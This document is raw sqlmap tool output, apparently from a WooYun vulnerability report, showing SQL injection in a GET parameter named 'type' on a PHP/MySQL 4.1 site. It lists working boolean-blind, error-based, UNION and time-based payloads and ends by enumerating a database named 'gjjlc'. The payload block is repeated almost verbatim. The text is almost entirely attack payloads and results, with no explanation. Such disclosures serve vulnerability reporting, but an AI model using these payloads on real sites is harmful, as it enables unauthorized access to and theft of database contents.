WooYun.org

Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=4 AND 5750=5750
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: type=4 AND ROW(8182,4201)>(SELECT COUNT(*),CONCAT(0x7167737271,(SELECT (CASE WHEN (8182=8182) THEN 1 ELSE 0 END)),0x7179627571,FLOOR(RAND(0)*2))x FROM (SELECT 9382 UNION SELECT 8609 UNION SELECT 9780 UNION SELECT 5576)a GROUP BY x)
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: type=-2474 UNION ALL SELECT NULL,NULL,CONCAT(0x7167737271,0x54746963794578774742,0x7179627571),NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: type=4 AND 5729=BENCHMARK(5000000,MD5(0x4d73634b))
---
web application technology: Apache, PHP 5.2.5
back-end DBMS: MySQL 4.1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=4 AND 5750=5750
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: type=4 AND ROW(8182,4201)>(SELECT COUNT(*),CONCAT(0x7167737271,(SELECT (CASE WHEN (8182=8182) THEN 1 ELSE 0 END)),0x7179627571,FLOOR(RAND(0)*2))x FROM (SELECT 9382 UNION SELECT 8609 UNION SELECT 9780 UNION SELECT 5576)a GROUP BY x)
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: type=-2474 UNION ALL SELECT NULL,NULL,CONCAT(0x7167737271,0x54746963794578774742,0x7179627571),NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: type=4 AND 5729=BENCHMARK(5000000,MD5(0x4d73634b))
---
web application technology: Apache, PHP 5.2.5
back-end DBMS: MySQL 4.1
available databases [1]:
[*] gjjlc